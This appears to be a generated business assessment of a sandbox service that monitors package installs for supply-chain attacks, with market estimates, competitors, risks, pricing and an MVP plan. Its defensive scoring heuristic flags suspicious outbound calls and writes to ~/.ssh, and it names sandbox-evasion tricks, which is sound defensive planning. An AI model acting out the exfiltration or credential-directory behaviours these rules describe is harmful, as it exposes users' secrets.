One commenter's company had to build a custom tool using Docker + tcpdump + Istio egress gateways to analyze package behavior — this is complex, bespoke infrastructure that every security-conscious org ends up rebuilding from scratch.
A SaaS or self-hosted service that automatically runs new/updated packages in instrumented sandbox containers, monitors network calls, filesystem access, and process spawning, then produces a trust score and detailed behavioral report. Integrates with CI/CD pipelines and artifact proxies to auto-approve or quarantine packages.
subscription — per-repository or per-scan pricing, with a free tier for open source projects
The pain signals are real — companies are literally building bespoke Docker+tcpdump+Istio solutions internally, which is expensive, fragile, and requires specialized expertise. The axios exploit comment ('it didn't block it in time') shows existing tools are failing. Every high-profile supply chain attack (SolarWinds, xz-utils, event-stream) reinforces urgency. Deducting 2 points because many orgs still treat this as 'nice to have' until they get hit, and the pain is concentrated in security-mature organizations.
TAM for supply chain security is $7-10B by 2028. The behavioral analysis sub-segment is perhaps 10-15% of that ($700M-1.5B). Serviceable market is security-conscious orgs (finance, healthcare, gov contractors) with 50+ developers — maybe 10,000-20,000 companies globally. At $30-100K/year average deal, that's a $300M-2B SAM. Strong enough for a venture-scale outcome but not as large as general SCA. Docking points because the buyer (security team) is a smaller budget center than engineering.
Security teams at regulated companies already spend $50K-500K+/year on SCA tools (Snyk, Sonatype). The companies building custom Docker+tcpdump solutions are spending far more in engineering time (2-3 senior engineers × months = $200K+ in labor). A $20-50K/year tool that replaces that custom infrastructure is an easy sell. However, this is a 'new category' sale — you're not replacing an existing line item, you're creating one. That's harder. Free tier for OSS creates bottom-up adoption but enterprise sales cycle will be 3-6 months.
This is the HARD part. A solo dev can build a basic sandbox that runs 'npm install' in a container and captures network traffic in 4-8 weeks — that's the MVP. BUT: (1) Scaling to millions of packages is compute-expensive, (2) anti-sandbox evasion is a real cat-and-mouse game, (3) distinguishing legitimate network calls (telemetry, update checks) from exfiltration requires sophisticated heuristics or ML, (4) covering multiple ecosystems (npm, pip, Maven, Go, RubyGems) multiplies complexity, (5) runtime analysis (not just install-time) requires instrumenting package imports which is language-specific and complex. The MVP is feasible; production-grade is a 6-12 month journey.
This is the strongest signal. Across ALL major competitors (Snyk, Socket, Sonatype, Endor Labs, JFrog Xray, Semgrep), NONE do runtime behavioral analysis. Only Phylum does install-time dynamic analysis, and even they don't monitor runtime behavior. The entire industry is stuck on static analysis and vulnerability database matching. The gap is real, well-defined, and validated by the fact that companies are building custom solutions. Socket's $65M raise and Phylum's existence prove the market values this direction — but nobody has nailed full behavioral analysis yet.
Natural subscription: packages update constantly, new packages are added weekly, threat landscape evolves daily. Per-repo or per-scan pricing scales with customer growth. Once integrated into CI/CD pipeline, switching costs are very high (security tooling is sticky — rip-and-replace is painful and risky). Continuous monitoring creates ongoing value. Self-hosted option for regulated industries adds enterprise tier pricing power. This is classic infrastructure SaaS with strong retention dynamics.
- +Clear, validated gap — no major competitor does full runtime behavioral analysis of packages
- +Strong market tailwinds — supply chain security spending growing 15-20% CAGR, driven by regulation (EO 14028, EU CRA) and real attacks
- +Pain is quantified — companies are spending $200K+ in engineering time building custom solutions with Docker+tcpdump+Istio
- +High switching costs and natural recurring revenue once embedded in CI/CD pipelines
- +Self-hosted option is a unique differentiator for regulated industries (finance, healthcare, gov) where data cannot leave the network
- +Complementary positioning possible — can sell alongside Snyk/Socket/Sonatype rather than competing head-on
- !TECHNICAL COMPLEXITY is the #1 risk — sandbox evasion, false positives from legitimate network calls, compute costs at scale, and multi-ecosystem coverage are genuinely hard problems
- !Phylum has a head start on dynamic analysis and could expand to full runtime monitoring before you gain traction
- !Socket ($65M funded) or Snyk ($7.4B valued) could add behavioral analysis as a feature, not a product — 'big company adds a checkbox' risk
- !Enterprise sales cycles in security are 3-6 months with POC requirements — long time to first revenue for a solo founder
- !Compute costs could be brutal — running every package version in a sandbox is expensive; unit economics need careful management
- !Sophisticated attackers already use anti-sandbox techniques (detecting virtualization, delayed payloads, environment checks) — arms race risk
Automated software supply chain risk analysis with partial dynamic analysis. Runs packages in sandboxes to monitor install-time behavior
Deep package inspection via static analysis of source code before installation. Detects typosquatting, obfuscated code, install script abuse, and dependency confusion. Strong GitHub PR integration. Founded by Feross Aboukhadijeh
The OG of supply chain security. Repository firewall that sits between developers and public registries, blocking risky components via policy. Maintains OSS Index vulnerability database. Owns Maven Central.
Largest developer-focused security platform. SCA product scans dependencies against proprietary vulnerability database. Also offers SAST, container scanning, and IaC scanning. 2,500+ enterprise customers.
Dependency analysis focused on reachability — determines whether vulnerabilities in your dependencies actually affect your code via function-level call graph analysis. Reduces false positive alerts by ~80%.
Week 1-2: Build a service that takes an npm package name+version, spins up an ephemeral Docker container, runs 'npm install', and captures all DNS queries, HTTP/HTTPS connections, file writes outside node_modules, and process spawns using strace+tcpdump. Week 3-4: Build a simple scoring algorithm (network calls to suspicious domains = red flag, writes to ~/.ssh = red flag, etc.) and a web dashboard showing the behavioral report. Week 5-6: Add a GitHub Action / CI integration that automatically scans new dependencies in PRs and comments with the trust score. Week 7-8: Add PyPI support and a Slack/webhook notification system. Ship with a free tier for public packages (pre-compute popular packages) and a waitlist for private repo scanning. DO NOT try to build runtime analysis (import-time monitoring) for MVP — install-time behavioral analysis is enough to prove value and is 10x simpler.
Free: Behavioral reports for top 10K public npm/PyPI packages (pre-computed, searchable). Starter ($29/month): Scan any public package on-demand, 100 scans/month, GitHub Action integration. Team ($149/month): Private registry scanning, 1000 scans/month, Slack alerts, artifact proxy integration. Enterprise ($500-2000/month): Self-hosted deployment, unlimited scans, Nexus/Artifactory integration, custom policies, SSO/SAML, audit logs. Scale path: Once embedded in CI/CD, expand to container image behavioral analysis (run Docker images and monitor behavior) — adjacent $2B+ market.
8-12 weeks to MVP launch with free tier and waitlist. 3-4 months to first paying customer (likely a small/mid security team willing to pay $29-149/month). 6-9 months to first enterprise deal ($500+/month). The key accelerant is pre-computing behavioral reports for popular packages and making them freely searchable — this creates SEO traffic and bottom-up awareness (developers Google 'is package X safe' and find your report). First $1K MRR: ~4 months. First $10K MRR: ~8-12 months.
- “My company built a tool to review the package in a Docker container using tcpdump to determine if the package is trying to exfiltrate packages”
- “I have been tasked with setting up an Istio egress gateway to MITM and block egress”
- “it didnt block the recent axios exploit in time”